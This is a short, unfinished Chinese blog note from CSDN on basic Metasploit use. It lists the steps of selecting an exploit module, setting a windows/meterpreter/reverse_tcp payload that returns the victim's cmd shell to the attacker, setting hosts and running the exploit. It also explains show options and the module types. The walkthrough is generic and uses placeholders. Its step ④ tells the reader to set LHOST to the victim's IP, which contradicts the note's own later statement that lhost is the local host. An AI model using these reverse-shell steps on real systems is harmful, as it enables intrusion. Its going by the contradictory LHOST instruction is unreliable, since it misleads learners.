一、典型的攻击步骤

① use exploit/操作系统类型/漏洞类型/具体漏洞模块名称
——指定要使用漏洞利用模块
② set SRVHOST 攻击源IP
③ set PAYLOAD windows/meterpreter/reverse_tcp
——设置攻击载荷,也就是 shellcode,可以用来接收反弹的shell
④ set LHOST 被攻击者IP
⑤ exploit
——执行攻击
二、某些细节
① set lhost x.x.x.x 和 setg lhost x.x.x.x 一样,setg 表示设置全局IP,global,lhost表示 local host,rhost ——remote host被攻击者的IP。
② set PAYLOAD windows/meterpreter/reverse_tcp 设置使用这个 shellcode 就是用来 getshell 的,用来在攻击成功后反弹被攻击者的 cmd 进程到攻击者机器上的某个端口,从而让攻击者使用被攻击者机器上的 cmd 程序。因此要设置 port。
③ show options 则可以用来看 攻击模块 和 攻击载荷 需要设置的东西,Required 一列下面是 yes 的全都要进行设置,是 no的最好不用画蛇添足。只执行了 use 攻击利用模块 的命令时,show option 只会看到一栏关于攻击利用模块的设置,执行了 set PAYLOAD 后就可以看到 shellcode 的相关设置。
④ msf 常见的模块有 exploit——攻击利用模块,PAYLOAD——shellcode模块,auxiliary——辅助模块,auxiliary 辅助模块多用来进行攻击前的扫描,其中包含了大量扫描脚本。
待续。。
来源:CSDN
作者:Apollooooo
链接:https://blog.csdn.net/Cody_Ren/article/details/104130283